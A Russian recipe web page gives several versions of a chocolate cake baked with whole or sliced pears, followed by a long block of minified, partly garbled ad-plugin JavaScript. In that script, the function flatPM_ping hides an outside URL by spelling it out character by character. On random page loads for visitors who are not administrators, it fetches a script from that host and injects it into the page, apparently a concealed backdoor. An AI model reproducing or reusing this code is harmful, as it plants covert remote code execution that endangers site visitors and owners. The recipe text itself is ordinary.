Шоколадный пирог с грушами

Шоколадный пирог с грушами — просто и эффектно. Пошаговый рецепт с фото

Шоколадный пирог с грушами — нежный, вкусный, красивый, и готовится он очень просто. Важно правильно выбрать форму и размер фруктов, иначе что-нибудь пойдет не так. Подберите форму для кекса, выберите груши, поставьте в форму. Фрукты должны подходить по высоте, а если поставить их в ряд, то между ними не должны оставаться пустоты — груши стоят плотненько, как пассажиры в автобусе в час пик. Так при нарезке на порции в каждом ломтике пирога окажется фруктовый ломтик.

Шоколадный пирог с грушами — просто и эффектно

Груши лучше выбрать сладкие, желательно без косточек, в этом рецепте сорт «Конференция», они как раз подошли — узкие, длинные, сладкие и сочные.

  • Время приготовления: 1 час
  • Количество порций: 8

Ингредиенты для шоколадного пирога с грушами

  • 4 груши сорта «Конференция»;
  • 2 куриных яйца;
  • 200 г сахарного песка;
  • 2 столовые ложки сметаны;
  • 65 г сливочного масла;
  • 120 г пшеничной муки;
  • 2 столовые ложки манной крупы;
  • 3 столовые ложки какао-порошка;
  • 2 чайные ложки разрыхлителя;
  • сахарная пудра;
  • соль.

Способ приготовления шоколадного пирога с грушами

Насыпаем в миску сахарный песок, разбиваем два свежих куриных яйца. Если яйца мелкие, то берём три штуки. Чтобы сбалансировать сладкий вкус, добавляем небольшую щепотку мелкой соли.

Насыпаем в миску сахарный песок, разбиваем два яйца и солим

Добавляем две столовые ложки с горкой жирной сметаны, перемешиваем ингредиенты венчиком, чтобы растворились крупинки сахарного песка.

На маленьком огне растапливаем в сотейнике сливочное масло, немного остужаем. Добавляем растопленное масло к жидким ингредиентам.

Пшеничную муку смешиваем с разрыхлителем теста, просеиваем. Добавляем в миску просеянную муку и манную крупу.

Добавляем жирную сметану и перемешиваем ингредиенты венчиком

Добавляем растопленное масло к жидким ингредиентам

Муку смешиваем с разрыхлителем теста, просеиваем. Добавляем в миску муку и манную крупу

Также насыпаем порошок какао (без сахара!), тщательно перемешиваем сухие и жидкие продукты, в результате получится гладкое шоколадное тесто без комков муки.

Насыпаем порошок какао, тщательно перемешиваем сухие и жидкие продукты

Прямоугольную форму для кекса смазываем сливочным маслом, посыпаем мукой. Выкладываем в форму всё тесто, оно должно её заполнить примерно наполовину или чуть меньше.

Выкладываем в форму тесто

Берём груши, тщательно моем, вытираем насухо. Кожуру счищать не нужно — в очищенные фрукты впитается шоколадное тесто и десерт будет выглядеть, мягко говоря, неаппетитно. На этом этапе фрукты значительно возвышаются над тестом, не пугайтесь, оно поднимется во время выпечки и всё спрячет.

Ставим в тесто груши

Духовку нагреваем до 165 градусов Цельсия. Ставим форму с пирогом на среднюю полочку духовки, печём примерно 45-50 минут. Палочкой эту выпечку не проверишь — можно проткнуть фрукты, поэтому придётся доверять интуиции или определять на ощупь.

Отправляем форму с пирогом в духовку, выпекаем примерно 45-50 минут

Готовый шоколадный пирог с грушами оставляем на 10-15 минут в форме, затем аккуратно извлекаем, остужаем до комнатной температуры.

Готовый пирог оставляем на 10-15 минут в форме, затем извлекаем и остужаем

Остывшую выпечку посыпаем сахарной пудрой через мелкое ситечко. Подаём к чаю или кофе, шарик мороженного на тарелке рядом с кусочком пирога будет очень кстати. Приятного аппетита!

Остывший шоколадный пирог с грушами посыпаем сахарной пудрой. Готово!

Нарезать пирог нужно, когда он полностью остынет, резать точно посередине торчащей груши, так получается эффектно и в каждой порции будут одинаковые ломтики фруктов.

Шоколадный пирог с грушами

Пирог очень вкусный! Классическое сочетание шоколадного бисквита и сладкой груши. А майонез придает тесту своеобразную пышность и мягкость. Всем рекомендую, особенно шоколюбам).

Ингредиенты для «Шоколадный пирог с грушами»:

  • Груша (Спелые, сладкие) — 3 шт
  • Масло сливочное (комнатной температуры) — 100 г
  • Сахар — 180 г
  • Яйцо куриное — 3 шт
  • Майонез — 50 г
  • Орехи — 100 г
  • Разрыхлитель теста — 10 г
  • Молоко — 100 мл
  • Какао-порошок — 4 ст. л.
  • Мука пшеничная / Мука — 200 г
  • Шоколад темный — 60 г
  • Сахарная пудра (Посыпать готовый пирог) — 30 г
  • Ассорти ягодное (Виноград и смородина для украшения) — 100 г

Время приготовления: 65 минут

Количество порций: 8

Рецепт «Шоколадный пирог с грушами»:

Груши почистить, разрезать пополам, удалить сердцевину. Форму для выпечки застелить пекарской бумагой, смазать сливочным маслом. Уложить груши срезом вниз.

Масло соединить с сахаром.

Взбить до пышной консистенции.

Ввести яйца и майонез, не переставая взбивать миксером.

Просеять в отдельную емкость муку, разрыхлитель и какао-порошок. Шоколад натереть на терке туда же.

Соединить жидкие и сухие ингредиенты. Добавить дробленые орехи. Аккуратно размешать лопаточкой методом складывания. Получившуюся шоколадную массу влить в форму поверх груш.

Выпекать в заранее прогретой духовке при 180 град. примерно 50 мин. Проверять готовность деревянной палочкой.

Готовый пирог остудить в форме, перевернуть, посыпать сахарной пудрой и украсить ягодами.
Приятного аппетита!

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Другие варианты рецепта

Рулет шоколадно-банановый с сырным кремом

  • 93
  • 260
  • 11590

Шоколадный пирог на майонезе

  • 53
  • 178
  • 6311

Похожие рецепты

Пирог “Сладкоежка”

  • 50
  • 220
  • 4172

Открытые пирожки с тыквой и сыром

  • 77
  • 137
  • 10623

Пирог Анке

  • 84
  • 995
  • 34409

Пирог яблочно-брусничный

  • 22
  • 165
  • 1877

Пирог “Золото Тропиков”

  • 8
  • 32
  • 3378

Бабушкины пироги на рисовом отваре

  • 173
  • 257
  • 9815

Пирог с картофелем и грибами

  • 61
  • 269
  • 5024

Пирог “Наслаждение”

  • 75
  • 102
  • 8148

Пирог домашний

  • 2
  • 22
  • 1981

Фотографии «Шоколадный пирог с грушами» от приготовивших (1)

Комментарии и отзывы

14 ноября 2014 года Zzoloto #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Aigul4ik #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Елена-13 #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Милодора #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Милодора #

14 ноября 2014 года IrikF #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Анастасия АГ #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Анастасия АГ #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

14 ноября 2014 года Esenija #

14 ноября 2014 года Марьяна_Z # (автор рецепта)

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Рецепт шоколадного пирога с грушами

Итальянский шоколадный пирог с грушами – идеальный вариант десерта для семейного торжества, романтического ужина или девичника. Сочетание ярких ноток кардамона с приятной, легкой горечью масла какао и сладостью сочных фруктов придает выпечке божественный вкус.

Ингредиенты

Для приготовления шоколадного итальянского пирога с грушами понадобятся:

  • куриные яйца – 5 штук;
  • молоко – жирность 2,5%, 280 мл;
  • груши – ароматные, сладкие, не перезревшие, 6 больших или 9 маленьких;
  • сыр маскарпоне либо масло сливочное – 220 г;
  • мука пшеничная, просеянная, высшего сорта – 350 г;
  • сахарный песок – 150 г;
  • щепотка кардамона;
  • соль – ¼ чайной ложки;
  • горький шоколад (содержание какао не менее 70%) – 250 г;
  • пищевой разрыхлитель или сода – половина чайной ложки.

Сыр маскарпоне можно заменить сливочным маслом с жирностью не менее 72,5%. Не обязательно искать дорогие груши экзотических разновидностей: ароматный «Дюшес» или сорт «Лесная красавица» идеально подходит.

На заметку! Если дома не оказалось шоколада, можно взять качественный порошок какао.

Для этого рецепта норма – 4 ст. л. без горки. Грушевый пирог с какао получается не менее нежным и ароматным, но с горьким шоколадом вкус будет более ярким, а оттенок – насыщенным.

Подготовка начинки

Существует несколько вариантов приготовления начинки для шоколадного пирога с грушами:

  1. Твердые груши очищают от кожуры, нарезают средними ломтиками. Затем их помещают в сироп (стакан воды + 2 ст. л. сахара + сок из среднего лимона + корица на кончике ножа), варят 5 минут, достают, ждут, пока фрукты остынут.
  2. Спелые, сочные груши с кожурой нарезают крупными кубиками либо тонкими пластинами. Полезно сбрызнуть ломтики лимонным соком: простая операция сохраняет приятный, кремово-белый оттенок мякоти.
  • пирог с грушей, кардамоном и шоколадом будет пышным, если белки взбить до крепких пиков, чтобы масса не падала с венчика или насадки миксера;
  • масло для пирога понадобится размягченное, а не топленое.

Приготовление теста и выпечка пирога

Чтобы приготовить пирог с грушей, следуйте следующему рецепту:

  1. Достаньте сливочное масло, поместите в миску, подождите: продукт должен стать мягким.
  2. Отделите белки от желтков. К желткам добавьте сахар, а к белкам – соль.
  3. Емкость с желтками оставьте при комнатной температуре, через 5 минут тщательно разотрите компоненты, чтобы смесь побелела. Проще сделать это при помощи миксера.
  4. Мисочку с белковой массой лучше убрать в холодильник на четверть часа: так проще добиться стойкой пены.
  5. Хорошо взбейте миксером или венчиком охлажденные белки с солью, обязательно до крутой пены.
  6. Соедините размягченное масло (сыр маскарпоне) с желтково-сахарной смесью, тщательно смешайте.
  7. Молоко надо немного подогреть, добавить в основу, соединить с другими компонентами. Всыпать тонкой струйкой просеянную пшеничную муку, соду или разрыхлитель.
  8. Далее, взбитые белки осторожно введите в основную массу, но не все сразу, а по пару ложек.
  9. Мешайте строго по часовой стрелке: так тесто сохраняет пышность.
  10. Разложите содержимое миски в две емкости. К одной части добавьте тертый горький шоколад, к другой – кардамон (дополнительно можно всыпать корицу на кончике ножа).
  11. Оптимальная консистенция теста должна быть, как у густой сметаны. Тугая масса плохо увеличивается в объеме, жидкая – получается не очень рыхлой, часто пристает к форме.
  12. Когда все готово, нужно прогреть духовку, а емкость смазать маслом, застелить пергаментом и посыпать мукой. При опасении, что пирог с грушей пристанет к основе, можно отказаться от бумаги. На форму из силикона или стекла достаточно нанести маргарин и тонкий слой муки.

В емкость сначала поместить шоколадное тесто, разложить подготовленную начинку, сверху залить содержимым с пряностями из другой миски .

Шоколадный пирог с грушами будет идеальным, если следовать таким советам:

  • Если груши нарезаны тонкими пластинами, то многие хозяйки советуют вначале выложить темное, затем светлое тесто, поверх – узор в виде цветка из фруктов и немного вдавить части плодов.
  • Духовка должна прогреться до 160 С. Форму с пирогом ставят для выпечки, на протяжении процесса дверцу не открывают, пока не пройдет 35–40 минут.
  • Приготовить фруктовую выпечку несложно, но если заглядывать в духовку каждые 10 минут, то середина пирога опадет, изделие будет неровным или не таким пышным.
  • Проверяют готовность десерта с грушами стандартным способом: лучинку или зубочистку помещают в самую объемную часть (центр), достают, смотрят, нет ли налипшего теста. Пирог готов, когда деревянная палочка остается чистой и сухой.
  • Когда пирог с грушами достают из духовки, его накрывают льняным или вафельным полотенцем. Вынимают из формы почти остывшее изделие.
  • Варианты декора пирога: посыпать поверхность просеянной сахарной пудрой, смазать растопленным шоколадом, нанести тонкий слой из Нутеллы. Если хорошо виден фруктовый «цветок», то достаточно присыпать пудрой края изделия.

При соблюдении инструкции, использовании всех ингредиентов грушевый пирог с горьким шоколадом непременно получится ароматным, пышным, с ярким вкусом. Десерт прекрасно сочетается с молоком, можно подать изысканную выпечку к чаю. Приятного аппетита!

Шоколадный пирог с грушами — интересный и вкусный пошаговый рецепт с фото

Приветствую вас, дорогие друзья!

Как-то повелось, что груши не так популярны, как яблоки, а зря! С такими фруктами выходят очень вкусные десерты: грушевое варенье, запеченная груша с шоколадом, грушевый джем, пирог с грушами и многое другое. Вот и решила я исправить такое отношение к грушам хотя бы у себя дома.

Сейчас самый сезон груш в Москве и Подмосковье. У меня дома груш уже просто девать некуда. Уже и посушили их на зиму, чтобы делать компоты, и варенье сварили. Куда остальные использовать? Остается одно — печь вкусные десерты. Нашла я тут хороший рецепт сытного и вкусного пирога, куда идут груши не резанными кусочками, а целыми. И удобно и красиво и необычно!

Испекла, значит, такой пирог. Так всем понравился моим домашним, что теперь просят еще и еще! Работы, чтобы испечь пирог, немного и поэтому таким пирогом можно радовать близких хоть каждый день, пока груши не кончатся.

Как приготовить шоколадный пирог с грушами — пошаговый рецепт

Нам понадобится:

  • Сливочное масло — 250 гр.;
  • Куриное яйцо — 5 шт.;
  • Мука — 200 гр.;
  • Сахар — 150 гр.;
  • Какао — 3 ст. л.;
  • Разрыхлитель — 1,5 ч.л.;
  • Груши мелкие — 7-9 шт.

Сахар растираем со сливочным маслом в глубокой посуде. Если сливочное масло замороженное, то его лучше предварительно натереть на терке. У меня как раз было замороженное масло, которое я натерла на крупной терке.

Разбиваем яйца по одному и добавляем к сливочному маслу и сахару. Хорошенько массу в чаше взбиваем миксером. Не волнуйтесь, что замороженное сливочное масло так и не растает — в пироге все испечется и будет красиво.

Теперь добавляем какао порошок и перемешиваем в нежную шоколадную массу.

Просеиваем муку с разрыхлителем и одновременно перемешиваем тесто. Тесто должно получиться как густая сметана.

Выливаем тесто в форму для выпечки. В этот раз я выбрала силиконовую форму. Тесто равномерно распределяем ложкой. Так как в тесте достаточно масла, то форму можно не смазывать. Готовый и остывший пирог легко вынимается из силиконовой форы.

Груши моем, обсушиваем бумажными полотенцами и выкладываем по кругу в тесто. Плодоножки у груш лучше не удалять. Держа за плодоножку, грушу легче воткнуть в тесто.

Тут как раз самый главный секрет пирога со стоячими ровно грушами — воткнуть плоды в тесто в форме, а не поставить их сперва в форму и уже потом заливать тестом .

Не переживайте, что фрукты полностью не вошли в тесто. При выпечке пирог поднимется, и груши уйдут в пирог по макушку.

Выпекаем десерт при 180 градусов по Цельсию в заранее разогретой духовке. Пирог нужно выпекать 45-50 минут. Готовность лучше проверить зубочисткой, воткнув ее в серединку теста. Если зубочистка останется сухой — пирог готов и можно доставать.

Пирог остужаем, вынимаем его из формы и выкладываем на большое блюдо. Сверху украшаем сахарной пудрой, которую просеиваем равномерно над поверхностью десерта через мелкое ситечко. Для украшения можно положить сверху несколько листиков свежей мяты.

Груши хорошо пропеклись; твердые плоды стали мягкими по консистенции. Пирог получился вкусным, шоколадным, нежным и сразу был съеден полностью до крошки вместе с чаем.

Приятного Вам аппетита!!

Шоколадный пирог с грушами Сохранить рецепт 2

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};